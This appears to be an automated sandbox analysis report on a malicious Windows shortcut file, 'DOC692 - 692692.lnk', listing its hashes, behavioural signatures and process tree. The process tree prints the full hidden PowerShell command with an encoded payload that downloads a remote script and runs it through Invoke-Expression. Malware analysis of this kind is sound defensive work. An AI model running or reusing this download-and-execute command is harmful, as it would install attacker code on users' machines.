Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
06-04-2024 01:11
Static task
static1
Behavioral task
behavioral1
Sample
DOC692 - 692692.lnk
Resource
win7-20240221-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
DOC692 - 692692.lnk
Resource
win10v2004-20240226-en
8 signatures
150 seconds
General
-
Target
DOC692 - 692692.lnk
-
Size
9KB
-
MD5
a344b567076691b5cd838512c99bc884
-
SHA1
0de4ad8f9f127c0c444bb7db4459d0977b1f6506
-
SHA256
decbd662ecab295cb2c060232a6de8218843d671b7cb628aaf769ba4bcdf126f
-
SHA512
ad6d3fed7647c933c9a23938f7c39a8799d5845cd6a9e1fec6d0a2044c740795d428e89467c4e5b1f8217217f272863438b68e160da312d6ae8498af9688dd98
-
SSDEEP
192:8z5phm3MSBfQbxE4l2g9FWV4FBno2dzSkbP43O5yrf68g493f61hVNeXkI:u5fcMS5Qb6EouFB3dzBbw3Omf68Zp9XV
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2548 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2548 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2376 wrote to memory of 2548 2376 cmd.exe powershell.exe PID 2376 wrote to memory of 2548 2376 cmd.exe powershell.exe PID 2376 wrote to memory of 2548 2376 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DOC692 - 692692.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548